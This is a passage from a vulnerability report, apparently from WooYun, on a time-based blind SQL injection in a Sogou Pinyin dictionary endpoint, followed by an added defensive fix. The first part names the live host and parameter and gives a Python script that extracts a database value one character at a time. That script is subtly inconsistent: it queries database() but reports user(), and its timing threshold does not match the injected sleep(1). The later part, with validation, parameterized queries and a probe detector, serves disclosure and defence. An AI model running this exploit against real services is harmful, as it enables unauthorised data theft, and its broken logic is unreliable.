
Sogou SQL injection 2: MySQL injection on pinyin.sogou.com

2014-11-29 05:10

The injection point is:

_____________________________________________________________

POST http://pinyin.sogou.com/dict/ywz/ajax/make_dict.php

custom_id_list=if(0,sleep(1),0)&ywz_id_list=427

_____________________________________________________________

The custom_id_list parameter is not filtered and is injectable.

A few lines of Python to guess user() one character at a time:

Code:

import http.client
import string
import sys
import time

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}

# Character set tried at each position: letters, digits and a few symbols.
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0, 10):
    payloads.append(str(i))
payloads += ['@', '_', '.']

print('Current user() is:')
user = ''
for i in range(1, 24, 1):
    for payload in payloads:
        try:
            conn = http.client.HTTPConnection('pinyin.sogou.com', timeout=10)
            url = '/dict/ywz/ajax/make_dict.php'
            start_time = time.time()
            # Note: the injected condition tests database(), not user(),
            # even though the report labels the recovered value as user().
            conn.request(method='POST',
                         url=url,
                         body='custom_id_list=if(ascii(mid(database(),%s,1))=%s,sleep(1),0)&ywz_id_list=427' % (i, ord(payload)),
                         headers=headers)
            html_doc = conn.getresponse().read()
            conn.close()
            # A delayed response (or a socket timeout) is treated as a hit
            # for the guessed character.
            if time.time() - start_time > 5:
                raise Exception('timeout')
        except Exception:
            user += payload
            sys.stdout.write(user + '\r')
            sys.stdout.flush()
            break




Proof of vulnerability:

user() is: dict_4_1_3

(screenshot: sogou_2.png)

Fix:

Filter the parameters and apply the necessary escaping.
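The following is an added example of the server-side fix the report asks for; it is not code from the report or from Sogou. It takes the two form parameters named in the report (custom_id_list and ywz_id_list), allow-lists them as comma-separated integer ids so that constructs such as if(...) and sleep(...) never reach MySQL, binds the ids as query parameters instead of concatenating them, and includes a small log-side check that flags values carrying time-based probe functions. The table and column names, the helper names and the sample request bodies are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs

# Allow-list: one or more integers of at most ten digits, separated by commas.
# Anything else (letters, parentheses, spaces, quotes) is rejected outright.
ID_LIST_RE = re.compile(r'^\d{1,10}(,\d{1,10})*$')

# Constructed request bodies: the report's probe, a single id, and a list.
SAMPLE_BODIES = [
    'custom_id_list=if(0,sleep(1),0)&ywz_id_list=427',
    'custom_id_list=12&ywz_id_list=427',
    'custom_id_list=1,2,3&ywz_id_list=427',
]


def is_valid_id_list(value):
    """True when the value is a comma-separated list of integer ids."""
    return ID_LIST_RE.match(value) is not None


def parse_id_list(value):
    """Return the integer ids in the list, or raise ValueError for any other input."""
    if not is_valid_id_list(value):
        raise ValueError('id list must be comma-separated integers')
    return [int(x) for x in value.split(',')]


def build_query(ids):
    """Build a parameterized IN (...) query with one placeholder per id.

    The ids travel as bound parameters, so even a valid-looking value is never
    spliced into the SQL text. Table and column names are assumptions.
    """
    placeholders = ','.join(['%s'] * len(ids))
    sql = 'SELECT id, word FROM custom_dict WHERE id IN (%s)' % placeholders
    return sql, tuple(ids)


def looks_like_time_based_probe(value):
    """Detection helper for request logs: flag values that carry the MySQL
    delay functions a time-based blind injection relies on."""
    v = value.lower()
    return 'sleep(' in v or 'benchmark(' in v


def handle_body(body):
    """Parse a form body, validate both id lists and return (sql, params),
    or None when the request is rejected."""
    params = parse_qs(body, keep_blank_values=True)
    custom = params.get('custom_id_list', [''])[0]
    ywz = params.get('ywz_id_list', [''])[0]
    try:
        ids = parse_id_list(custom)
        parse_id_list(ywz)
    except ValueError:
        return None
    return build_query(ids)


if __name__ == '__main__':
    for body in SAMPLE_BODIES:
        result = handle_body(body)
        flagged = looks_like_time_based_probe(body)
        print(body, '->', result if result else 'rejected', '| probe:', flagged)
```

The regular expression is the actual control: once only digits and commas can pass, escaping is no longer what keeps the query safe, and the placeholders are a second line of defence for the case where a future field does need free text.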

Source: www.wooyun.org/bugs/wooyun-2014-079383
